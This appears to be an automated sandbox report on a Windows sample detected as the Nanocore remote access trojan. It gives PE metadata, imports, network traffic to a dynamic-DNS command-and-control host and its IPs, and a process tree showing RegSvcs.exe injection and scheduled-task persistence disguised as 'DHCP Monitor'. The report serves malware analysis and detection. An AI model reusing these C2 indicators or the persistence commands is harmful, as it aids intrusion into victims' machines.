        .text0x10000x305810x30600False0.589268410853data6.70021125825IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        .rdata0x320000xa3320xa400False0.455030487805data5.23888424127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data0x3d0000x238b00x1200False0.368272569444data3.83993526939IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
        .gfids0x610000xe80x200False0.333984375data2.12166381533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .rsrc0x620000x4c280x4e00False0.602263621795data6.36874241417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .reloc0x670000x210c0x2200False0.786534926471data6.61038519378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

        Resources

        NameRVASizeTypeLanguageCountry
        PNG0x625240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
        PNG0x6306c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
        RT_ICON0x646180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 134243974, next used block 1626799870
        RT_DIALOG0x649000x286dataEnglishUnited States
        RT_DIALOG0x64b880x13adataEnglishUnited States
        RT_DIALOG0x64cc40xecdataEnglishUnited States
        RT_DIALOG0x64db00x12edataEnglishUnited States
        RT_DIALOG0x64ee00x338dataEnglishUnited States
        RT_DIALOG0x652180x252dataEnglishUnited States
        RT_STRING0x6546c0x1e2dataEnglishUnited States
        RT_STRING0x656500x1ccdataEnglishUnited States
        RT_STRING0x6581c0x1b8dataEnglishUnited States
        RT_STRING0x659d40x146Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500EnglishUnited States
        RT_STRING0x65b1c0x446dataEnglishUnited States
        RT_STRING0x65f640x166dataEnglishUnited States
        RT_STRING0x660cc0x152dataEnglishUnited States
        RT_STRING0x662200x10adataEnglishUnited States
        RT_STRING0x6632c0xbcdataEnglishUnited States
        RT_STRING0x663e80xd6dataEnglishUnited States
        RT_GROUP_ICON0x664c00x14data
        RT_MANIFEST0x664d40x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

        Imports

        DLLImport
        KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
        gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

        Possible Origin

        Language of compilation systemCountry where language is spokenMap
        EnglishUnited States

        Network Behavior

        Snort IDS Alerts

        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
        10/11/21-22:29:37.142185UDP254DNS SPOOF query response with TTL of 1 min. and no authority53539108.8.8.8192.168.2.3
        10/11/21-22:29:55.963084UDP254DNS SPOOF query response with TTL of 1 min. and no authority53521308.8.8.8192.168.2.3
        10/11/21-22:31:05.092278UDP254DNS SPOOF query response with TTL of 1 min. and no authority53553938.8.8.8192.168.2.3

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Oct 11, 2021 22:29:16.698590994 CEST4974648562192.168.2.3197.210.84.227
        Oct 11, 2021 22:29:19.845594883 CEST4974648562192.168.2.3197.210.84.227
        Oct 11, 2021 22:29:25.846190929 CEST4974648562192.168.2.3197.210.84.227
        Oct 11, 2021 22:29:37.144545078 CEST4974748562192.168.2.3197.210.84.227
        Oct 11, 2021 22:29:40.144151926 CEST4974748562192.168.2.3197.210.84.227
        Oct 11, 2021 22:29:46.160325050 CEST4974748562192.168.2.3197.210.84.227
        Oct 11, 2021 22:29:55.965475082 CEST4976148562192.168.2.3197.210.84.227
        Oct 11, 2021 22:29:59.067702055 CEST4976148562192.168.2.3197.210.84.227
        Oct 11, 2021 22:30:05.068166971 CEST4976148562192.168.2.3197.210.84.227
        Oct 11, 2021 22:30:14.101757050 CEST4976448562192.168.2.3185.19.85.175
        Oct 11, 2021 22:30:14.113111973 CEST4856249764185.19.85.175192.168.2.3
        Oct 11, 2021 22:30:14.678342104 CEST4976448562192.168.2.3185.19.85.175
        Oct 11, 2021 22:30:14.696242094 CEST4856249764185.19.85.175192.168.2.3
        Oct 11, 2021 22:30:15.366213083 CEST4976448562192.168.2.3185.19.85.175
        Oct 11, 2021 22:30:15.383961916 CEST4856249764185.19.85.175192.168.2.3
        Oct 11, 2021 22:30:19.411773920 CEST4979148562192.168.2.3185.19.85.175
        Oct 11, 2021 22:30:19.437004089 CEST4856249791185.19.85.175192.168.2.3
        Oct 11, 2021 22:30:19.944379091 CEST4979148562192.168.2.3185.19.85.175
        Oct 11, 2021 22:30:19.963534117 CEST4856249791185.19.85.175192.168.2.3
        Oct 11, 2021 22:30:20.476780891 CEST4979148562192.168.2.3185.19.85.175
        Oct 11, 2021 22:30:20.520962954 CEST4856249791185.19.85.175192.168.2.3
        Oct 11, 2021 22:30:24.540857077 CEST4980348562192.168.2.3185.19.85.175
        Oct 11, 2021 22:30:24.558051109 CEST4856249803185.19.85.175192.168.2.3
        Oct 11, 2021 22:30:25.075697899 CEST4980348562192.168.2.3185.19.85.175
        Oct 11, 2021 22:30:25.093930006 CEST4856249803185.19.85.175192.168.2.3
        Oct 11, 2021 22:30:25.607342958 CEST4980348562192.168.2.3185.19.85.175
        Oct 11, 2021 22:30:25.618659973 CEST4856249803185.19.85.175192.168.2.3
        Oct 11, 2021 22:30:30.090179920 CEST4980648562192.168.2.3197.210.84.227
        Oct 11, 2021 22:30:33.101931095 CEST4980648562192.168.2.3197.210.84.227
        Oct 11, 2021 22:30:39.102528095 CEST4980648562192.168.2.3197.210.84.227
        Oct 11, 2021 22:30:47.814519882 CEST4982848562192.168.2.3197.210.84.227
        Oct 11, 2021 22:30:50.824409962 CEST4982848562192.168.2.3197.210.84.227
        Oct 11, 2021 22:30:56.826141119 CEST4982848562192.168.2.3197.210.84.227
        Oct 11, 2021 22:31:05.103924990 CEST4982948562192.168.2.3197.210.84.227

        UDP Packets

        TimestampSource PortDest PortSource IPDest IP
        Oct 11, 2021 22:29:16.670052052 CEST5280653192.168.2.38.8.8.8
        Oct 11, 2021 22:29:16.686587095 CEST53528068.8.8.8192.168.2.3
        Oct 11, 2021 22:29:37.122045994 CEST5391053192.168.2.38.8.8.8
        Oct 11, 2021 22:29:37.142184973 CEST53539108.8.8.8192.168.2.3
        Oct 11, 2021 22:29:55.940438032 CEST5213053192.168.2.38.8.8.8
        Oct 11, 2021 22:29:55.963083982 CEST53521308.8.8.8192.168.2.3
        Oct 11, 2021 22:30:30.033157110 CEST6098253192.168.2.38.8.8.8
        Oct 11, 2021 22:30:30.051671982 CEST53609828.8.8.8192.168.2.3
        Oct 11, 2021 22:30:47.756072044 CEST5153953192.168.2.38.8.8.8
        Oct 11, 2021 22:30:47.775213003 CEST53515398.8.8.8192.168.2.3
        Oct 11, 2021 22:31:05.071070910 CEST5539353192.168.2.38.8.8.8
        Oct 11, 2021 22:31:05.092278004 CEST53553938.8.8.8192.168.2.3

        DNS Queries

        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
        Oct 11, 2021 22:29:16.670052052 CEST192.168.2.38.8.8.80xcd37Standard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
        Oct 11, 2021 22:29:37.122045994 CEST192.168.2.38.8.8.80xbdd8Standard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
        Oct 11, 2021 22:29:55.940438032 CEST192.168.2.38.8.8.80xbfbaStandard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
        Oct 11, 2021 22:30:30.033157110 CEST192.168.2.38.8.8.80xda86Standard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
        Oct 11, 2021 22:30:47.756072044 CEST192.168.2.38.8.8.80xa386Standard query (0)strongodss.ddns.netA (IP address)IN (0x0001)
        Oct 11, 2021 22:31:05.071070910 CEST192.168.2.38.8.8.80x8ebStandard query (0)strongodss.ddns.netA (IP address)IN (0x0001)

        DNS Answers

        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
        Oct 11, 2021 22:29:16.686587095 CEST8.8.8.8192.168.2.30xcd37No error (0)strongodss.ddns.net197.210.84.227A (IP address)IN (0x0001)
        Oct 11, 2021 22:29:37.142184973 CEST8.8.8.8192.168.2.30xbdd8No error (0)strongodss.ddns.net197.210.84.227A (IP address)IN (0x0001)
        Oct 11, 2021 22:29:55.963083982 CEST8.8.8.8192.168.2.30xbfbaNo error (0)strongodss.ddns.net197.210.84.227A (IP address)IN (0x0001)
        Oct 11, 2021 22:30:30.051671982 CEST8.8.8.8192.168.2.30xda86No error (0)strongodss.ddns.net197.210.84.227A (IP address)IN (0x0001)
        Oct 11, 2021 22:30:47.775213003 CEST8.8.8.8192.168.2.30xa386No error (0)strongodss.ddns.net197.210.84.227A (IP address)IN (0x0001)
        Oct 11, 2021 22:31:05.092278004 CEST8.8.8.8192.168.2.30x8ebNo error (0)strongodss.ddns.net197.210.84.227A (IP address)IN (0x0001)

        Code Manipulations

        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        Behavior

        Click to jump to process

        System Behavior

        Analysis Process: dUzAkYsvl8.exe PID: 6428 Parent PID: 5144

        General

        Start time:22:28:50
        Start date:11/10/2021
        Path:C:\Users\user\Desktop\dUzAkYsvl8.exe
        Wow64 process (32bit):true
        Commandline:'C:\Users\user\Desktop\dUzAkYsvl8.exe'
        Imagebase:0x1f0000
        File size:1021780 bytes
        MD5 hash:9A4A8643DB95A8C0FE52AF8675A5D1B1
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low

        Chronological Activities

        Analysis Process: cjlaro.pif PID: 5028 Parent PID: 6428

        General

        Start time:22:28:57
        Start date:11/10/2021
        Path:C:\Users\user\77066510\cjlaro.pif
        Wow64 process (32bit):true
        Commandline:'C:\Users\user\77066510\cjlaro.pif' txoxpdjc.qnr
        Imagebase:0x1130000
        File size:776432 bytes
        MD5 hash:279DAE7236F5F2488A4BACDE6027F730
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        Antivirus matches:
        • Detection: 100%, Joe Sandbox ML
        • Detection: 37%, Metadefender, Browse
        • Detection: 56%, ReversingLabs
        Reputation:low

        Chronological Activities

        Analysis Process: RegSvcs.exe PID: 6364 Parent PID: 5028

        General

        Start time:22:29:02
        Start date:11/10/2021
        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Imagebase:0x120000
        File size:45152 bytes
        MD5 hash:2867A3817C9245F7CF518524DFD18F28
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Yara matches:
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp, Author: Joe Security
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.560258652.0000000005630000.00000004.00020000.sdmp, Author: Florian Roth
        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.560258652.0000000005630000.00000004.00020000.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.557771680.0000000002A31000.00000004.00000001.sdmp, Author: Joe Security
        Reputation:high

        Chronological Activities

        Analysis Process: schtasks.exe PID: 5252 Parent PID: 6364

        General

        Start time:22:29:10
        Start date:11/10/2021
        Path:C:\Windows\SysWOW64\schtasks.exe
        Wow64 process (32bit):true
        Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp1EC2.tmp'
        Imagebase:0x10d0000
        File size:185856 bytes
        MD5 hash:15FF7D8324231381BAD48A052F85DF04
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Chronological Activities

        Analysis Process: conhost.exe PID: 6612 Parent PID: 5252

        General

        Start time:22:29:12
        Start date:11/10/2021
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff7f20f0000
        File size:625664 bytes
        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Chronological Activities

        Analysis Process: schtasks.exe PID: 1240 Parent PID: 6364

        General

        Start time:22:29:12
        Start date:11/10/2021
        Path:C:\Windows\SysWOW64\schtasks.exe
        Wow64 process (32bit):true
        Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
        Imagebase:0x7ff70d6e0000
        File size:185856 bytes
        MD5 hash:15FF7D8324231381BAD48A052F85DF04
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Chronological Activities

        Analysis Process: cjlaro.pif PID: 2132 Parent PID: 3352

        General

        Start time:22:29:12
        Start date:11/10/2021
        Path:C:\Users\user\77066510\cjlaro.pif
        Wow64 process (32bit):false
        Commandline:'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr
        Imagebase:0x1130000
        File size:776432 bytes
        MD5 hash:279DAE7236F5F2488A4BACDE6027F730
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:low

        Chronological Activities

        Analysis Process: conhost.exe PID: 6432 Parent PID: 1240

        General

        Start time:22:29:12
        Start date:11/10/2021
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff7f20f0000
        File size:625664 bytes
        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Chronological Activities

        Analysis Process: RegSvcs.exe PID: 6748 Parent PID: 664

        General

        Start time:22:29:14
        Start date:11/10/2021
        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Wow64 process (32bit):true
        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0
        Imagebase:0xf50000
        File size:45152 bytes
        MD5 hash:2867A3817C9245F7CF518524DFD18F28
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Reputation:high

        Chronological Activities

        Analysis Process: conhost.exe PID: 6828 Parent PID: 6748

        General

        Start time:22:29:16
        Start date:11/10/2021
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff7f20f0000
        File size:625664 bytes
        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Chronological Activities

        Analysis Process: dhcpmon.exe PID: 6836 Parent PID: 664

        General

        Start time:22:29:16
        Start date:11/10/2021
        Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        Wow64 process (32bit):true
        Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
        Imagebase:0xd30000
        File size:45152 bytes
        MD5 hash:2867A3817C9245F7CF518524DFD18F28
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:.Net C# or VB.NET
        Antivirus matches:
        • Detection: 0%, Metadefender, Browse
        • Detection: 0%, ReversingLabs

        Chronological Activities

        Analysis Process: conhost.exe PID: 6816 Parent PID: 6836

        General

        Start time:22:29:17
        Start date:11/10/2021
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff7f20f0000
        File size:625664 bytes
        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language

        Chronological Activities

        Analysis Process: cjlaro.pif PID: 7152 Parent PID: 3352

        General

        Start time:22:29:18
        Start date:11/10/2021
        Path:C:\Users\user\77066510\cjlaro.pif
        Wow64 process (32bit):true
        Commandline:'C:\Users\user\77066510\cjlaro.pif' C:\Users\user\77066510\txoxpdjc.qnr
        Imagebase:0x1130000
        File size:776432 bytes
        MD5 hash:279DAE7236F5F2488A4BACDE6027F730
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, Author: Florian Roth
        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, Author: Joe Security
        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
